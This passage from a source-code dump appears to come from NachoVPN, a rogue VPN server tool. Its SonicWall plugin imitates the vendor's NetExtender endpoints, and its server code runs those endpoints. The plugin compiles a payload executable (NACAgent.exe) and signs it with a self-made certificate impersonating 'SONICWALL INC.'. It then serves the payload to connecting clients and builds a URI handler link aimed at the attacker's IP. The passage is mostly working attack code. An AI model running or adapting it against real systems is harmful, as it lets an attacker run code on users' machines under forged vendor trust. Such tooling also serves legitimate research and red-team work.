self.logger.info(request.data) self.logger.info(request.args) self.logger.info(request.form) self.logger.info(request.endpoint) self.logger.info(request.method) self.logger.info(request.remote_addr) return Response("Connection Established", status=200, mimetype='text/plain') @self.flask_app.route('/sonicwall/ca.crt') def cert(): cert_path = os.path.join(os.getcwd(), 'certs', 'ca.crt') if not os.path.exists(cert_path): return abort(404) return send_file(cert_path) @self.flask_app.route('/cgi-bin/welcome') def welcome(): return self.render_template('welcome.html') @self.flask_app.route('/cgi-bin/userLogin', methods = ['POST', 'GET']) def user_login(): resp = Response('') resp.set_cookie('swap', self.random_swap()) return resp @self.flask_app.route('/cgi-bin/sslvpnclient', methods = ['POST', 'GET']) def ssl_vpnclient(): if request.args.get('getepcprofiles'): return 'X-NE-sslvpnnac-allow: {}\r\nX-NE-sslvpnnac-deny: {}' elif request.args.get('launchnetextender'): return self.render_template('launchextender.html') elif request.args.get('versionquery'): return 'NX_WINDOWS_VER: 0x00000000;\n NX_TUNNEL_PROTO_VER: 2.0;\n NX_MAY_CHANGE_PASSWORD:0;\n NX_WIN_MIN_GOOD_VERSION: 0x0a020153;\n' elif request.args.get('launchplatform'): return self.render_template('launchplatform.html') elif request.args.get('epcversionquery'): return 'NX_WINDOWS_EPC_VER: 0xFF;' elif request.args.get('gettunnelfailedinfo'): return '' \ '' elif request.args.get('launchextrainfos'): return 'connProxy = 0;\nconnPacURL = ;\nconnProxyURL = ;\nconnProxyByPass = ;\n' elif request.form.get('setclienthostname'): return '' return abort(404) @self.flask_app.route('/cgi-bin/sessionStatus') def session_status(): if request.form.get('touchSession'): return {"status":"touch ok", "nxnoneedtouchsession": "true"} return abort(404) @self.flask_app.route('/cgi-bin/getaovconf', methods = ['POST', 'GET']) def getaovconf(): return { "result": 0,"aovTempShutDown": 0, "aovAllowAlwaysOnVPN": 0, "aovAllowUserDisconnect": 0, "aovUserEmail": "", "aovAllowAccessWhenVPNFailToConnect": 0, "aovAllowNoConnectInTrustedNetwork": 0, "aovSecureHosts": "", "nePrimaryDns": "1.1.1.1", "neSecondaryDns": "8.8.8.8", "dnsDomainSuffixes": "" } @self.flask_app.route('/cgi-bin/tunneltype', methods = ['POST', 'GET']) def tunnel_type(): return {"preferVPN": "SSLVPN","allowedVPN": "NONE"} @self.flask_app.route('/cgi-bin/epcs', methods = ['POST', 'GET']) def epcs(): return 'X-NE-epcret: pass' @self.flask_app.route('/cgi-bin/wxacneg') def wxacneg(): return self.render_template('wxacneg.html') @self.flask_app.route('/cgi-bin/userLogout') def logout(): return self.render_template('logout.html') @self.flask_app.route('/NXSetupU.exe') def nxsetup(): if not os.path.exists(os.path.join(self.payload_dir, 'NXSetupU.exe')): return abort(404) return send_file(os.path.join(self.payload_dir, 'NXSetupU.exe')) @self.flask_app.route('/NACAgent.exe') def nacagent(): if not os.path.exists(os.path.join(self.payload_dir, 'NACAgent.exe')): return abort(404) return send_file(os.path.join(self.payload_dir, 'NACAgent.exe')) @self.flask_app.route('/NXSetupU.exe.manifest') def nxsetup_manifest(): if not os.path.exists(os.path.join(self.payload_dir, 'NXSetupU.exe.manifest')): return abort(404) return send_file(os.path.join(self.payload_dir, 'NXSetupU.exe.manifest')) @self.flask_app.route('/cgi-bin/extendauthentication', methods = ['POST', 'GET']) def extendauthentication(): resp = make_response('{"response":"OK"}') resp.set_cookie('swap', self.random_swap()) return resp @self.flask_app.route('/sonicwall') def index(): # the sonicwallconnectagent:// URI handler must use the external IP address and NOT the DNS name token = { "action": 10, "helperversion": "1.1.42", "host": self.external_ip, "port": "443", "username": "user", "extendid": base64.b64encode(os.urandom(32)).decode() } data = json.dumps(token).replace(' ', '') encoded = urllib.parse.quote(base64.b64encode(str(data).encode()).decode()) url = f"sonicwallconnectagent://{encoded}" return f"" def compile_payload(self): source_file = os.path.join(self.files_dir, 'NACAgent.c') output_file = os.path.join(self.payload_dir, 'NACAgent.exe') if not os.path.exists(source_file) or not os.path.exists('/usr/bin/x86_64-w64-mingw32-gcc'): return False proc = subprocess.run([ "/usr/bin/x86_64-w64-mingw32-gcc", "-L", "/usr/x86_64-w64-mingw32/lib", "-o", output_file, source_file, "--static", "-lwtsapi32", "-luserenv" ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) return proc.returncode == 0 and os.path.exists(output_file) def verify_payload(self): # Verify that the payload is signed by our current CA if os.name == "nt": self.logger.error("Windows payload verification not supported yet") return True if os.name == "posix" and not os.path.exists('/usr/bin/osslsigncode'): self.logger.error("osslsigncode not found, skipping verification") return True proc = subprocess.run([ "/usr/bin/osslsigncode", "verify", "-CAfile", self.cert_manager.ca_cert_path, "-in", os.path.join(self.payload_dir, 'NACAgent.exe'), ], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) if proc.returncode: self.logger.error(f"Failed to verify {os.path.join(self.payload_dir, 'NACAgent.exe')}: {proc.returncode}") return False self.logger.info(f"{os.path.join(self.payload_dir, 'NACAgent.exe')} verified") return True def setup_payload(self): # skip on Windows for now (we can use signtool if needed) if os.name == 'nt': return True # If the payload already exists and is validly signed, skip compilation/signing if os.path.exists(os.path.join(self.payload_dir, 'NACAgent.exe')) and \ self.verify_payload(): self.logger.info(f"{os.path.join(self.payload_dir, 'NACAgent.exe')} already exists and is validly signed") return True # the user can provide their own sonicwall.pfx file in the certs directory # if not, a new signing certificate will be generated and self-signed by the CA cert_path = os.path.join('certs', 'sonicwall.cer') key_path = os.path.join('certs', 'sonicwall.key') pfx_path = os.path.join('certs', 'sonicwall.pfx') if not os.path.exists(pfx_path) or not self.cert_manager.cert_is_valid(cert_path, "SONICWALL INC."): pfx_path = self.cert_manager.generate_codesign_certificate( common_name="SONICWALL INC.", pfx_path=pfx_path, cert_path=cert_path, key_path=key_path ) # sign NACAgent.exe input_file = os.path.join(self.payload_dir, 'NACAgent.exe') output_file = os.path.join(self.payload_dir, 'NACAgent.exe.signed') if not os.path.exists(input_file): # attempt to compile the default payload from source if not self.compile_payload(): self.logger.warning(f"Warning: {input_file} does not exist and could not be compiled. Payload will not be served.") return False proc = subprocess.run(["/usr/bin/osslsigncode", 'sign', '-pkcs12', pfx_path, '-in', input_file, '-out', output_file], stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL) if proc.returncode or not os.path.exists(output_file): self.logger.warning(f"Warning: {input_file} could not be signed. Payload will not be served.") return False else: shutil.move(output_file, input_file) return True ================================================ FILE: src/nachovpn/plugins/sonicwall/templates/launchextender.html ================================================ Virtual Office
 
 

You may also manually download NetExtender and run it.
You may be required to login again after launching.


To get NetExtender for another platform go to the All Downloads page.

NetExtender ActiveX Installer Instructions
  Step 1 - A yellow information bar may appear at the top of the browser.
  Step 2 - If it does, please click on the yellow bar and choose Install ActiveX Control...
  Step 3 - If a Security Warning window appear,
Click Install to proceed.
================================================ FILE: src/nachovpn/plugins/sonicwall/templates/launchplatform.html ================================================ Virtual Office SessionId = py0nwVXgydGW17JQXQRq6nYdObmqUQyrzEUTbK8os8I= Route = 192.168.200.0/255.255.255.0 ipv6Support = no Compression = yes dns1 = 1.1.1.1 dns2 = 8.8.8.8 pppFrameEncoded = 0 PppPref = async displayName = user NX_TUNNEL_PROTO_VER = 2.0 TunnelAllMode = 0 UninstallAfterExit = 0; ExitAfterDisconnect = 0; NoProfileCreate = 0; AllowSavePassword = 0; AllowSaveUser = 1; AllowSavePasswordInKeychain = 0; AllowSavePasswordInKeystore = 0; AllowSavePasswordInKeychainMac = 0; AllowSavePasswordInKeychainFaceIDiOS = 0; AllowDisableUpdate = 0; ================================================ FILE: src/nachovpn/plugins/sonicwall/templates/logout.html ================================================ Virtual Office ================================================ FILE: src/nachovpn/plugins/sonicwall/templates/welcome.html ================================================ Virtual Office


Processing... Processing...
================================================ FILE: src/nachovpn/plugins/sonicwall/templates/wxacneg.html ================================================ Page Not Found

Error: The page you are trying to access is not available. Click here to go back.
================================================ FILE: src/nachovpn/server.py ================================================ from nachovpn.core.request_handler import VPNStreamRequestHandler from nachovpn.core.plugin_manager import PluginManager from nachovpn.core.cert_manager import CertManager from nachovpn.core.db_manager import DBManager from nachovpn.plugins import VPNPlugin from nachovpn.core.packet_handler import PacketHandler from nachovpn.core.smb_manager import SMBManager import nachovpn.plugins import logging import inspect import socket import socketserver import os import sys import threading import asyncio import argparse logging.basicConfig( level=logging.INFO, format='%(asctime)s - %(name)s - %(levelname)s - %(message)s - [%(module)s.%(funcName)s]' ) class ThreadedVPNServer(socketserver.ThreadingTCPServer): def __init__(self, server_address, RequestHandlerClass, cert_manager, plugin_manager, use_tls=True): self.cert_manager = cert_manager self.plugin_manager = plugin_manager super().__init__(server_address, RequestHandlerClass) if use_tls: self.socket = cert_manager.ssl_context.wrap_socket(self.socket, server_side=True) class VPNServer: def __init__(self, host='0.0.0.0', port=443, tls=True, cert_dir=os.path.join(os.getcwd(), 'certs')): self.host = host self.port = port self.tls = tls # Setup certificates self.cert_manager = CertManager(cert_dir) self.cert_manager.setup() # Initialize database self.db_manager = DBManager() # Start SMB server self.smb_manager = SMBManager() # Setup plugin manager with cert hash self.plugin_manager = PluginManager() # Common plugin kwargs plugin_kwargs = { 'write_pcap': os.getenv("WRITE_PCAP", False), 'cert_manager': self.cert_manager, 'external_ip': os.getenv('EXTERNAL_IP', socket.gethostbyname(socket.gethostname())), 'dns_name': os.getenv('SERVER_FQDN') or os.getenv('WEBSITE_HOSTNAME', socket.gethostname()), 'db_manager': self.db_manager, } # Create PacketHandler self.packet_handler = PacketHandler(write_pcap=plugin_kwargs['write_pcap']) plugin_kwargs['packet_handler'] = self.packet_handler self.plugin_manager.packet_handler = self.packet_handler # Register plugins for name, plugin in inspect.getmembers(nachovpn.plugins, inspect.isclass): if issubclass(plugin, VPNPlugin) and plugin != VPNPlugin: self.plugin_manager.register_plugin(plugin, **plugin_kwargs) # Allow reuse of the address socketserver.ThreadingTCPServer.allow_reuse_address = True # Set packet handler self._packet_handler_thread = None self._packet_handler_loop = None def _start_packet_handler(self): def run(): loop = asyncio.new_event_loop() asyncio.set_event_loop(loop) self._packet_handler_loop = loop loop.run_until_complete(self.packet_handler.start()) loop.run_forever() self._packet_handler_thread = threading.Thread(target=run, daemon=True) self._packet_handler_thread.start() def _stop_packet_handler(self): if self._packet_handler_loop: self._packet_handler_loop.call_soon_threadsafe(self._packet_handler_loop.stop) if self._packet_handler_thread: self._packet_handler_thread.join(timeout=5) def run(self): # Start PacketHandler self._start_packet_handler() try: with ThreadedVPNServer( (self.host, self.port), VPNStreamRequestHandler, self.cert_manager, self.plugin_manager, self.tls ) as server: logging.info(f"Server listening on {self.host}:{self.port}") server.serve_forever() finally: self._stop_packet_handler() def main(): parser = argparse.ArgumentParser(description='NachoVPN Server') parser.add_argument('--port', type=int, default=443, help='Port to listen on (default: 443)') parser.add_argument('--no-tls', dest='tls', action='store_false', help='Disable TLS encryption (default: enabled)') parser.add_argument('--host', default='0.0.0.0', help='Host to bind to (default: 0.0.0.0)') parser.add_argument('--cert-dir', default=os.path.join(os.getcwd(), 'certs'), help='Certificate directory (default: ./certs)') parser.add_argument('-d', '--debug', action='store_true', help='Enable debug logging') parser.add_argument('-q', '--quiet', action='store_true', help='Enable quiet logging (warnings only)') args = parser.parse_args() # Set log level log_level = logging.INFO if args.debug: log_level = logging.DEBUG elif args.quiet: log_level = logging.WARNING logging.getLogger().setLevel(log_level) server = VPNServer(host=args.host, port=args.port, tls=args.tls, cert_dir=args.cert_dir) try: server.run() except KeyboardInterrupt: logging.info("\nShutting down...") if __name__ == '__main__': main()